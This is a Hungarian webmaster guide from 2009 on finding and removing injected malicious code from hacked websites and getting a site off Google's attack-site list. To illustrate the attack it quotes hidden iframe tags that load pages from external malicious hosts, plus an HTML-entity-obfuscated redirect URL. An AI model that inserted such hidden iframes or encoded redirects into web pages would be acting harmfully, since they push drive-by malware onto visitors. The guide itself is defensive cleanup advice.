Feltört webhelyek és a Google

július 1, 2009

Manapság gyakran „törnek fel” úgy weboldalakat, hogy tulajdonosuk számára sokáig észrevétlen marad. Az oldalgazdák sokszor csak akkor értesülnek minderről, ha a Google kereső „Az oldal káros lehet számítógéped számára” figyelmeztetést, vagy böngészőjük „Bejelentett támadó webhely” figyelmeztetést jelenít meg.

A Google számára adatot gyűjtő keresőrobotok a weboldalak tetemes hányadát bejárják, letöltik és elemzik, eközben vizsgálják a weblapok tartalmát, hogy nem próbálnak-e észrevétlenül valamilyen ismert, káros fájlt letöltetni a látogatókkal.

Ha netalán ilyen weblapot találnak webhelyünkön, akkor két problémánk lesz: oldalunk a Google keresőben pusztán korlátozottan, a modern böngészőkben pedig egyáltalán nem fog megjelenni:

Mindez természetesen látogatottságunk csökkenésével fog járni, tehát ha a látogatottsági statisztikánkban hirtelen zuhanást érzékelünk, akkor érdemes megvizsgálni, hogy nem „fertőzött”-e webhelyünk.

Technikai megvalósítás

Weboldalunkat feltörő illetéktelenek nem tesznek egyebet, minthogy beszúrnak a meglévő weblapok kódjába egy olyan linket, egyébként a látogatók számára láthatatlan, mely által az összes látogató, aki megtekinti a weboldalt, letölt egy olyan programot, mely kárt okozhat számítógépében.

Legtöbbször egy iframe elemet szúrnak bele a weboldal kódjába, amit többféleképpen próbálhatnak láthatatlanná tenni, vagy a width és height paraméterek 1-re vagy 0-ra vételével, vagy pedig valamilyen CSS paraméterrel, mint pl. style=”visibility:hidden”, style=”display:none”.

<iframe src="http://b1a.ru:8080/index.php" width=142 height=172 style="visibility: hidden"></iframe>  <IFRAME SRC="http://shopmovielife.cn:8080/index.php" STYLE="visibility: hidden;" HEIGHT="189" WIDTH="147"></iframe>

A hivatkozott URL-t kódolhatják akár URL encoding segítségével, akár pedig hexadecimális számokkal meghatározott HTML entitás felhasználásával például a következőhöz hasonló kóddal, amit pedig egy JavaScript segítségével feloldanak. (ami egyébként helytelen, mert nincsenek pontosvesszők az entitások végén):

  &#104&#116&#116&#112&#58&#47&#47&#114&#97&#122&#111&#114&#115&#116&#117&#100&#105&#111&#46&#111&#114&#103&#47&#97&#100&#118&#116&#100&#115&#47&#111&#117&#116&#46&#112&#104&#112&#63&#115&#95&#105&#100&#61&#49

mindez a legtöbb böngészőben az alábbi módon jelenik meg:

  http://razorstudio.org/advtds/out.php?s_id=1

Mi a teendő?

  1. keressük meg és távolítsuk el a kérdéses kódot a weblapokról
  2. előzzük meg az oldal „újrafertőződését”
  3. jelentsük be az oldal megtisztítását a Google Webmaster Tools oldalon. 

Káros kód megkeresése

  • A weblapok kódjában legtöbbször a <body> elem után vagy a </body> elem előtt közvetlenül fordul elő a hackerek által beszúrt kód.
  • Ha ott nem látnánk gyanús elemeket, akkor abból kell kiindulni, hogy a weblapunk letöltésekor egy másik szerverről töltetnének le velünk egy fájlt, ez pedig csakis úgy lehet, hogy valahol szerepel a másik, „fertőzést terjesztő” szerver címe, amiben pedig biztos benne lesz a http:// karakterlánc.
  • Ha a weblap kódjában a http:// -re keresve semmi gyanúsat nem észlelünk, akkor keressünk rá a javascript kifejezésre, és kutassunk a fent leírt gyanús kódolások után.

Az „újrafertőződés” megelőzése

Elméletben a webtárhelyünkhöz vagy a szerver feltörésével, vagy pedig az általunk használt számítógép és programok biztonsági hibáit kiaknázva férhetnek hozzá webhelyünkhöz. Ennek megfelelően cselekedjünk, hogy ez többé ne fordulhasson elő:

  1. változtassuk meg a hozzáférés jelszavait
  2. ha saját a szerver, akkor frissítsük a szerveren használt programokat
  3. ha bérelt tárhelyünk van, akkor értesítsük a tárhely üzemeltetőjét
  4. futtassunk vírusellenőrzést az általunk használt gépen

Az oldal megtisztításának bejelentése

Miután regisztráltunk a Google Webmestereszközök szolgáltatására és felvettük ellenőrzött webhelyünkként a problémás oldalt, kérjük a webhely újrafelvételét itt: https://www.google.com/webmasters/tools/reconsideration?hl=hu

Ha eddig még nem regisztráltunk a Webmaster Tools-ra, akkor érdemes megfontolni a regisztrációt a gyorsabb ügyintézés reményében. Ha mégsem szeretnénk regisztrálni, akkor kérhetjük az oldal felülvizsgálatát a http://stopbadware.org/home/review címen is.

Mennyi idő telik el, míg újra „tisztának” minősül az oldal?

Általában pár órától pár hétig terjedő időszak alatt kerül le a weboldal a bejelentett támadó webhelyek listájáról. Ha mégsem történik ezidő alatt változás, akkor

  • Ellenőrizzük újra, hogy tényleg minden weblapról eltávolítottuk-e a kérdéses ártalmas kódot
  • Végezzünk linképítést, hiszen ez a késedelmet lehet, hogy az okozza, hogy weboldalunk kevéssé tűnik fontosnak a keresők számára, és ezért csak nagy ritkán látogatják meg a keresőrobotok, így nem szereznek tudomást a változásokról.

További olvasnivaló